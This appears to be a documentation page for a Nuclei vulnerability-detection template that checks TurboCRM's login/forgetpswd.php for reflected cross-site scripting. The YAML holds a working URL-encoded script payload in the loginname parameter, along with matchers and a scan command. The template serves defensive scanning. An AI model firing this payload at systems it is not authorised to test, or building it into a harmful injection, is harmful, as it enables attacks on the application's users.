TurboCRM - Cross-Site Scripting
ID: turbocrm-xss
Severity: high
Author: pikpikcu
Tags: xss,turbocrm
Description
Section titled “Description”TurboCRM contains a cross-site scripting vulnerability which allows a remote attacker to inject arbitrary JavaScript into the response returned by the application.
YAML Source
Section titled “YAML Source”id: turbocrm-xss
info: name: TurboCRM - Cross-Site Scripting author: pikpikcu severity: high description: TurboCRM contains a cross-site scripting vulnerability which allows a remote attacker to inject arbitrary JavaScript into the response returned by the application. reference: - https://gist.github.com/pikpikcu/9689c5220abbe04d4927ffa660241b4a classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 metadata: max-request: 1 tags: xss,turbocrm
http: - method: GET path: - '{{BaseURL}}/login/forgetpswd.php?loginsys=1&loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'
matchers-condition: and matchers: - type: word words: - '"><script>alert(document.domain)</script>' part: body
- type: word part: header words: - "text/html"
- type: status status: - 200# digest: 4b0a00483046022100f9d36e39f00e4d61e14d875968d6886e3e51c150460a3ad81c413f579eba44fa022100dfdcc0e2a4dc327cbb8e4a2da67240df857f7ceeeff1b9c9f8d7ac95ff6b985d:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/other/turbocrm-xss.yaml"